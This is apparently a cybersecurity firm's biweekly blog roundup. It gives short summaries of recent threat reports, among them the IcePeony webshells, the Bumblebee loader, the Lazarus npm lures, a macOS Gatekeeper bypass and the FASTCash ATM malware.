+1.813.321.0987

Welcome to our biweekly cybersecurity roundup. In these blog posts, we feature curated articles and insights from experts, providing you with valuable information on the latest cybersecurity threats, technologies, and best practices to keep yourself and your organization safe. Whether you’re a cybersecurity professional or a concerned individual, our biweekly blog post is designed to keep you informed and empowered.

For more articles, check out our #onpatrol4malware blog.

IcePeony Hackers Exploiting Public Web Servers To Inject Webshells

Source: GBHackers

IcePeony, a China-nexus APT group, has been active since 2023, targeting India, Mauritius, and Vietnam by exploiting SQL injection vulnerabilities to compromise systems using webshells and backdoors, leveraging a custom IIS malware called IceCache. Read more.

WrnRAT disguised as a gambling game

Source: ASEC

The attacker created a homepage disguised as a gambling game, and if the game access device is downloaded, malicious code is installed that can control the infected system and steal information. The malicious code appears to have been created by the attacker himself, and it is called WrnRAT based on the string used in its creation. Read more.


New Bumblebee Loader Infection Chain Signals Possible Resurgence

Source: Netskope

The infection likely starts via a phishing email luring the victim to download a ZIP file and extract and execute the file inside it. The ZIP file contains an LNK file named “Report-41952.lnk” that, once executed, starts a chain of events to download and execute the final Bumblebee payload in memory, avoiding the need to write the DLL on disk, as observed in previous campaigns. Read more.

Stealer here, stealer there, stealers everywhere!

Source: SECURELIST

According to Kaspersky Digital Footprint Intelligence, almost 10 million devices, both personal and corporate, were attacked by information stealers in 2023. That said, the real number of the attacked devices may be even higher, as not all stealer operators publish all their logs immediately after stealing data. Read more.

Bored BeaverTail Yacht Club – A Lazarus Lure

Source: eSENTIRE

Upon installation of the malicious NPM packages through Visual Studio Code, the NPM packages attempted to download a Python executable and associated components from a remote location through a cURL command, attempting to retrieve the initial components of the InvisibleFerret backdoor malware. Read more.

Gatekeeper Bypass: Uncovering Weaknesses in a macOS Security Mechanism

Source: UNIT 42

Apple assumes that developers will comply with their security guidelines regarding the inheritance of extended attributes, to ensure that this scanning mechanism can properly function. Because this is not necessarily the case, this can pose a weakness in the Gatekeeper mechanism. Read more.

Call stack spoofing explained using APT41 malware

Source: CYBER GEEKS

Call stacks are a telemetry source for EDR software that can be used to determine if a process made suspicious actions. The purpose of the technique is to construct a fake call stack that mimics a legitimate call stack in order to hide suspicious activity that might be detected by EDR or other security software. Read more.

UAT-5647 targets Ukrainian and Polish entities with RomCom malware variants

Source: Cisco TALOS

The latest series of attacks deploys an updated version of the RomCom malware we track as “SingleCamper”. This version is loaded directly from registry into memory and uses loopback address to communicate with its loader. Read more.

US disables Anonymous Sudan infrastructure linked to DDoS attack spree

Source: CYBERSECURITY DIVE

“The FBI’s seizure of this powerful attack tool successfully disabled the attack platform that caused widespread damage and destruction to critical infrastructure and networks across the world,” Rebecca Day, special agent in charge of the FBI Anchorage field office, said in a statement. Read more.

New FASTCash malware Linux variant helps steal money from ATMs

Source: BLEEPING COMPUTER

North Korean hackers are using a new Linux variant of the FASTCash malware to infect the payment switch systems of financial institutions and perform unauthorized cash withdrawals. Read more.